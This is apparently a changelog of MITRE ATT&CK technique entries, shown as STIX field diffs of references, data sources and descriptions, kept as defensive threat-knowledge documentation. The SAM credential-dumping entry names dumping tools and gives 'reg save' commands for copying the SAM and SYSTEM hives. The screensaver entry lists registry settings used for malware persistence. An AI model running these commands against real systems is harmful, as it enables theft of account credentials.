modified2020-10-22 16:35:54.740000+00:002022-04-19 02:50:42.074000+00:00
external_references[1]['source_name']Wikipedia BootingITWorld Hard Disk Health Dec 2014
external_references[1]['description']Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.
external_references[1]['url']https://en.wikipedia.org/wiki/Bootinghttps://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html
external_references[2]['source_name']ITWorld Hard Disk Health Dec 2014Wikipedia Booting
external_references[2]['description']Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.Wikipedia. (n.d.). Booting. Retrieved November 13, 2019.
external_references[2]['url']https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.htmlhttps://en.wikipedia.org/wiki/Booting
x_mitre_data_sources[0]Command: Command ExecutionDrive: Drive Modification
x_mitre_data_sources[1]Network Traffic: Network Connection CreationDriver: Driver Metadata
x_mitre_data_sources[2]Firmware: Firmware ModificationProcess: OS API Execution
x_mitre_data_sources[3]Driver: Driver MetadataFirmware: Firmware Modification
x_mitre_data_sources[4]Process: OS API ExecutionCommand: Command Execution
x_mitre_data_sources[5]Drive: Drive ModificationNetwork Traffic: Network Connection Creation
x_mitre_detectionPerform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014)
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsmacOS

[T1620] Reflective Code Loading

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-11-01 18:09:09.670000+00:002022-04-21 16:21:09.679000+00:00
external_references[1]['source_name']Introducing Donut00sec Droppers
external_references[1]['description']The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.
external_references[1]['url']https://thewover.github.io/Introducing-Donut/https://0x00sec.org/t/super-stealthy-droppers/3715
external_references[3]['source_name']Stuart ELF MemoryMandiant BYOL
external_references[3]['description']Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.
external_references[3]['url']https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.htmlhttps://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique
external_references[4]['source_name']00sec DroppersS1 Old Rat New Tricks
external_references[4]['description']0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.
external_references[4]['url']https://0x00sec.org/t/super-stealthy-droppers/3715https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/
external_references[5]['source_name']Mandiant BYOLMDSec Detecting DOTNET
external_references[5]['description']Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021.MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.
external_references[5]['url']https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-techniquehttps://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/
external_references[7]['source_name']S1 Old Rat New TricksStuart ELF Memory
external_references[7]['description']Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.
external_references[7]['url']https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
external_references[8]['source_name']MDSec Detecting DOTNETIntroducing Donut
external_references[8]['description']MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.
external_references[8]['url']https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/https://thewover.github.io/Introducing-Donut/
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsJoas Antonio dos Santos, @C0d3Cr4zy, Inmetrics
x_mitre_data_sourcesScript: Script Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_contributorsJoas Antonio dos Santos, @C0d3Cr4zy
x_mitre_data_sourcesScript: Script Execution

[T1021] Remote Services

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 14:15:07.272000+00:002022-03-28 16:07:45.017000+00:00
x_mitre_data_sources[0]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[1]Network Traffic: Network Connection CreationNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowNetwork Share: Network Share Access
x_mitre_data_sources[4]Command: Command ExecutionProcess: Process Creation
x_mitre_data_sources[5]Network Share: Network Share AccessModule: Module Load
x_mitre_data_sources[6]Module: Module LoadNetwork Traffic: Network Connection Creation

[T1564.009] Hide Artifacts: Resource Forking

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-16 01:50:40.276000+00:002022-05-05 05:10:23.890000+00:00
external_references[1]['source_name']macOS Hierarchical File System Overviewtau bundlore erika noerenberg 2020
external_references[1]['description']Tenon. (n.d.). Retrieved October 12, 2021.Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.
external_references[1]['url']http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html
external_references[5]['source_name']tau bundlore erika noerenberg 2020macOS Hierarchical File System Overview
external_references[5]['description']Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021.Tenon. (n.d.). Retrieved October 12, 2021.
external_references[5]['url']https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.htmlhttp://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553
x_mitre_data_sources[0]File: File CreationProcess: Process Creation
x_mitre_data_sources[1]Process: Process CreationCommand: Command Execution
x_mitre_data_sources[3]Command: Command ExecutionFile: File Creation
x_mitre_defense_bypassed[0]Notarization; GatekeeperNotarization
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_defense_bypassedGatekeeper

[T1014] Rootkit

Current version: 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesKurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.
external_referencesCAPEC-552
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM', 'root']
external_referencesCAPEC-552
external_referencesPan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 22:29:55.496000+00:002022-05-05 05:09:39.723000+00:00
external_references[1]['source_name']capecCrowdStrike Linux Rootkit
external_references[1]['url']https://capec.mitre.org/data/definitions/552.htmlhttps://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
external_references[2]['source_name']Symantec Windows RootkitsBlackHat Mac OSX Rootkit
external_references[2]['description']Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.
external_references[2]['url']https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdfhttp://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdf
external_references[3]['source_name']Wikipedia RootkitSymantec Windows Rootkits
external_references[3]['description']Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.
external_references[3]['url']https://en.wikipedia.org/wiki/Rootkithttps://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf
external_references[4]['source_name']CrowdStrike Linux RootkitWikipedia Rootkit
external_references[4]['description']Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.
external_references[4]['url']https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/https://en.wikipedia.org/wiki/Rootkit
external_references[5]['source_name']BlackHat Mac OSX Rootkitcapec
external_references[5]['url']http://www.blackhat.com/docs/asia-14/materials/Tsai/WP-Asia-14-Tsai-You-Cant-See-Me-A-Mac-OS-X-Rootkit-Uses-The-Tricks-You-Havent-Known-Yet.pdfhttps://capec.mitre.org/data/definitions/552.html
x_mitre_defense_bypassed[0]File monitoringAnti-virus
x_mitre_defense_bypassed[1]Host intrusion prevention systemsFile Monitoring
x_mitre_defense_bypassed[2]Application controlHost Intrusion Prevention Systems
x_mitre_defense_bypassed[3]Signature-based detectionApplication Control
x_mitre_defense_bypassed[4]System access controlsSignature-based Detection
x_mitre_defense_bypassed[5]Application control by file name or pathSystem Access Controls
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedAnti-virus

[T1553.003] Subvert Trust Controls: SIP and Trust Provider Hijacking

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['SYSTEM', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:58:04.719000+00:002022-05-05 04:58:58.214000+00:00
external_references[1]['source_name']Microsoft AuthenticodeEntrust Enable CAPI2 Aug 2017
external_references[1]['description']Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.
external_references[1]['url']https://msdn.microsoft.com/library/ms537359.aspxhttp://www.entrust.net/knowledge-base/technote.cfm?tn=8165
external_references[2]['source_name']Microsoft WinVerifyTrustGitHub SIP POC Sept 2017
external_references[2]['description']Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.
external_references[2]['url']https://msdn.microsoft.com/library/windows/desktop/aa388208.aspxhttps://github.com/mattifestation/PoCSubjectInterfacePackage
external_references[4]['source_name']EduardosBlog SIPs July 2008Microsoft Catalog Files and Signatures April 2017
external_references[4]['description']Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.
external_references[4]['url']https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files
external_references[5]['source_name']Microsoft Catalog Files and Signatures April 2017Microsoft Audit Registry July 2012
external_references[5]['description']Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.
external_references[5]['url']https://docs.microsoft.com/windows-hardware/drivers/install/catalog-fileshttps://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)
external_references[6]['source_name']GitHub SIP POC Sept 2017Microsoft Registry Auditing Aug 2016
external_references[6]['description']Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.
external_references[6]['url']https://github.com/mattifestation/PoCSubjectInterfacePackagehttps://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)
external_references[7]['source_name']Entrust Enable CAPI2 Aug 2017Microsoft Authenticode
external_references[7]['description']Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.
external_references[7]['url']http://www.entrust.net/knowledge-base/technote.cfm?tn=8165https://msdn.microsoft.com/library/ms537359.aspx
external_references[8]['source_name']Microsoft Registry Auditing Aug 2016Microsoft WinVerifyTrust
external_references[8]['description']Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.
external_references[8]['url']https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx
external_references[9]['source_name']Microsoft Audit Registry July 2012EduardosBlog SIPs July 2008
external_references[9]['description']Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.
external_references[9]['url']https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/
x_mitre_data_sources[0]Module: Module LoadWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationModule: Module Load
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication Control
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_defense_bypassedApplication control

[T1546.002] Event Triggered Execution: Screensaver

Current version: 1.0


Old Description
New Description
t1Adversaries may establish persistence by executing malicioust1Adversaries may establish persistence by executing malicious
> content triggered by user inactivity. Screensavers are prog> content triggered by user inactivity. Screensavers are prog
>rams that execute after a configurable time of user inactivi>rams that execute after a configurable time of user inactivi
>ty and consist of Portable Executable (PE) files with a .scr>ty and consist of Portable Executable (PE) files with a .scr
> file extension.(Citation: Wikipedia Screensaver) The Window> file extension.(Citation: Wikipedia Screensaver) The Window
>s screensaver application scrnsave.scr is located in <code>C>s screensaver application scrnsave.scr is located in <code>C
>:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</>:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</
>code>  on 64-bit Windows systems, along with screensavers in>code>  on 64-bit Windows systems, along with screensavers in
>cluded with base Windows installations.  The following scree>cluded with base Windows installations.  The following scree
>nsaver settings are stored in the Registry (<code>HKCU\Contr>nsaver settings are stored in the Registry (<code>HKCU\Contr
>ol Panel\Desktop\</code>) and could be manipulated to achiev>ol Panel\Desktop\</code>) and could be manipulated to achiev
>e persistence:  * <code>SCRNSAVE.exe</code> - set to malicio>e persistence:  * <code>SCRNSAVE.exe</code> - set to malicio
>us PE path * <code>ScreenSaveActive</code> - set to '1' to e>us PE path * <code>ScreenSaveActive</code> - set to '1' to e
>nable the screensaver * <code>ScreenSaverIsSecure</code> - s>nable the screensaver * <code>ScreenSaverIsSecure</code> - s
>et to '0' to not require a password to unlock * <code>Screen>et to '0' to not require a password to unlock * <code>Screen
>SaveTimeout</code> - sets user inactivity timeout before scr>SaveTimeout</code> - sets user inactivity timeout before scr
>eensaver is executed  Adversaries can use screensaver settin>eensaver is executed  Adversaries can use screensaver settin
>gs to maintain persistence by setting the screensaver to run>gs to maintain persistence by setting the screensaver to run
> malware after a certain timeframe of user inactivity. (Cita> malware after a certain timeframe of user inactivity.(Citat
>tion: ESET Gazer Aug 2017)>ion: ESET Gazer Aug 2017)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 12:23:04.955000+00:002022-04-20 16:58:48.140000+00:00
descriptionAdversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017)
external_references[1]['source_name']Wikipedia ScreensaverESET Gazer Aug 2017
external_references[1]['description']Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
external_references[1]['url']https://en.wikipedia.org/wiki/Screensaverhttps://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
external_references[2]['source_name']ESET Gazer Aug 2017Wikipedia Screensaver
external_references[2]['description']ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.Wikipedia. (2017, November 22). Screensaver. Retrieved December 5, 2017.
external_references[2]['url']https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdfhttps://en.wikipedia.org/wiki/Screensaver
x_mitre_data_sources[0]Process: Process CreationFile: File Creation
x_mitre_data_sources[1]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[3]File: File CreationWindows Registry: Windows Registry Key Modification

[T1596] Search Open Technical Databases

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:50:44.308000+00:002022-10-18 22:45:19.607000+00:00
external_references[1]['source_name']WHOISCircl Passive DNS
external_references[1]['description']NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.
external_references[1]['url']https://www.whois.net/https://www.circl.lu/services/passive-dns/
external_references[3]['source_name']Circl Passive DNSMedium SSL Cert
external_references[3]['description']CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.
external_references[3]['url']https://www.circl.lu/services/passive-dns/https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
external_references[4]['source_name']Medium SSL CertWHOIS
external_references[4]['description']Jain, M. (2019, September 16). Export & Download — SSL Certificate from Server (Site URL). Retrieved October 20, 2020.NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
external_references[4]['url']https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2https://www.whois.net/
external_references[5]['source_name']SSLShopper LookupShodan
external_references[5]['description']SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
external_references[5]['url']https://www.sslshopper.com/ssl-checker.htmlhttps://shodan.io
external_references[6]['source_name']DigitalShadows CDNSSLShopper Lookup
external_references[6]['description']Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.
external_references[6]['url']https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/https://www.sslshopper.com/ssl-checker.html
external_references[7]['source_name']ShodanDigitalShadows CDN
external_references[7]['description']Shodan. (n.d.). Shodan. Retrieved October 20, 2020.Swisscom & Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.
external_references[7]['url']https://shodan.iohttps://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

[T1003.002] OS Credential Dumping: Security Account Manager

Current version: 1.0


Old Description
New Description
t1Adversaries may attempt to extract credential material from t1Adversaries may attempt to extract credential material from 
>the Security Account Manager (SAM) database either through i>the Security Account Manager (SAM) database either through i
>n-memory techniques or through the Windows Registry where th>n-memory techniques or through the Windows Registry where th
>e SAM database is stored. The SAM is a database file that co>e SAM database is stored. The SAM is a database file that co
>ntains local accounts for the host, typically those found wi>ntains local accounts for the host, typically those found wi
>th the <code>net user</code> command. Enumerating the SAM da>th the <code>net user</code> command. Enumerating the SAM da
>tabase requires SYSTEM level access.  A number of tools can >tabase requires SYSTEM level access.  A number of tools can 
>be used to retrieve the SAM file through in-memory technique>be used to retrieve the SAM file through in-memory technique
>s:  * pwdumpx.exe * [gsecdump](https://attack.mitre.org/soft>s:  * pwdumpx.exe * [gsecdump](https://attack.mitre.org/soft
>ware/S0008) * [Mimikatz](https://attack.mitre.org/software/S>ware/S0008) * [Mimikatz](https://attack.mitre.org/software/S
>0002) * secretsdump.py  Alternatively, the SAM can be extrac>0002) * secretsdump.py  Alternatively, the SAM can be extrac
>ted from the Registry with Reg:  * <code>reg save HKLM\sam s>ted from the Registry with Reg:  * <code>reg save HKLM\sam s
>am</code> * <code>reg save HKLM\system system</code>  Creddu>am</code> * <code>reg save HKLM\system system</code>  Creddu
>mp7 can then be used to process the SAM database locally to >mp7 can then be used to process the SAM database locally to 
>retrieve hashes.(Citation: GitHub Creddump7)  Notes:  * RID >retrieve hashes.(Citation: GitHub Creddump7)  Notes:   * RID
>500 account is the local, built-in administrator. * RID 501 > 500 account is the local, built-in administrator. * RID 501
>is the guest account. * User accounts start with a RID of 1,> is the guest account. * User accounts start with a RID of 1
>000+. >,000+. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['SYSTEM']
values_changed
STIX FieldOld valueNew Value
modified2020-03-25 15:17:30.640000+00:002022-06-15 16:17:19.049000+00:00
descriptionAdversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with Reg: * reg save HKLM\sam sam * reg save HKLM\system system Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7) Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,000+.
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Access
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Access

[T1489] Service Stop

Current version: 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM', 'User']
values_changed
STIX FieldOld valueNew Value
modified2021-03-02 22:11:32.017000+00:002022-07-28 18:47:11.957000+00:00
external_references[1]['source_name']Talos Olympic Destroyer 2018SecureWorks WannaCry Analysis
external_references[1]['description']Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.
external_references[1]['url']https://blog.talosintelligence.com/2018/02/olympic-destroyer.htmlhttps://www.secureworks.com/research/wcry-ransomware-analysis
external_references[2]['source_name']Novetta BlockbusterTalos Olympic Destroyer 2018
external_references[2]['description']Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.
external_references[2]['url']https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdfhttps://blog.talosintelligence.com/2018/02/olympic-destroyer.html
external_references[3]['source_name']SecureWorks WannaCry AnalysisNovetta Blockbuster
external_references[3]['description']Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.
external_references[3]['url']https://www.secureworks.com/research/wcry-ransomware-analysishttps://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
x_mitre_data_sources[0]Process: Process CreationService: Service Metadata
x_mitre_data_sources[1]Command: Command ExecutionWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[3]Service: Service MetadataCommand: Command Execution
x_mitre_data_sources[4]Windows Registry: Windows Registry Key ModificationProcess: Process Creation
x_mitre_data_sources[5]File: File ModificationProcess: Process Termination
x_mitre_data_sources[6]Process: Process TerminationFile: File Modification

[T1574.011] Hijack Execution Flow: Services Registry Permissions Weakness

Current version: 1.1

New Detections:

Dropped Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
